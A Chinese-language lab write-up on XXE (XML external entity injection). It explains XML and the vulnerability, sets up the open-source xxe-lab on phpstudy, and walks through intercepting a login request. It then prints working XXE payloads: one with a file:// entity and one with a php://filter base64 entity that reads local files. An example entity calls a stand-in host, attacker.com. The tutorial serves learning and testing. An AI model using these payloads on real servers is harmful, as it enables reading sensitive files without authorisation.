xxe漏洞
本文仅作为学习参考使用,本文作者对任何使用本文进行渗透攻击破坏不负任何责任。
一,漏洞简介。
1,xml简述。
XML(Extensible Markup Language)是一种用于标记数据的简单易读的文本格式,主要用于存储和传输数据。它的设计初衷是为了使得数据在不同的软件之间交换变得容易。XML的核心特点包括:
-
结构化:XML文档由标签(<tag>…</tag>)包围的数据组成,每个元素都有明确的开始和结束标签,形成了层次结构。
-
自定义标记:开发者可以根据需要创建自己的标签,以描述特定的应用场景或数据类型。
-
可扩展性:XML允许添加新的元素和属性,使其能够适应不断变化的信息需求。
-
纯文本格式:XML文件可以用文本编辑器直接查看,易于理解和修改。
-
分离内容和结构:内容和标记分开,这使得数据独立于显示样式,便于数据转换和处理。
然而,虽然XML本身并不提供强大的数据操作功能,但通常结合XPath或XSLT等技术来处理和转换XML数据。
2,漏洞简述。
XXE全称为XML External Entity Injection,即XML外部实体注入攻击,是一种常见的Web应用程序安全漏洞。它发生在处理用户提供的XML数据时,恶意用户能够利用服务器对XML外部实体文件的解析请求,注入恶意脚本或命令,从而获取敏感信息、执行任意代码甚至控制整个系统。
攻击者通过构造特殊的XML文档,包含指向不受限制的外部实体引用(如<!ENTITY x SYSTEM "http://attacker.com/command.php">
),当服务器尝试解析这个XML并加载外部实体时,就会触发远程代码执行。这种漏洞常见于那些缺乏充分验证和安全配置的XML解析库中。
二,靶场搭建。
靶场地址:https://github.com/c0ny1/xxe-labhttps://github.com/c0ny1/xxe-lab1,将其下载到phpstudy的www文件夹下,并解压。
下载好后,可以看到,内部有很多不同的压缩问文件,仅解压php版本即可。
解压后,新建网站,就可以直接使用。
使用本机ip打开后:
三,攻击测试。
1,进行抓包。
在交互界面输入:账户为:admin;密码为:root,并抓包。
账号密码传输数据的格式是 xml,可以考虑在这里传输其他的恶意数据,因为登录口传输的既然是 xml 数据,那么后端接收的时候,肯定是 xml 解析,既能会解析,那么我们就传恶意的 xml 数据给它解析,让他执行。
2,将其发送到重放器中进行编辑。
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE XL [
<!ENTITY fl SYSTEM "file:///F:\phpstudy_pro\WWW\g.php">]>
<user><username>&fl;</username><password>asdf</password></user>
在本地新建php文件,尝试读取。
测试失败,此处应使用php伪协议,并使用base64进行读取。
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE XL [
<!ENTITY fl SYSTEM "php://filter/read=convert.base64-encode/resource=f:/g.txt">]>
<user><username>&fl;</username><password>asdf</password></user>
读取成功。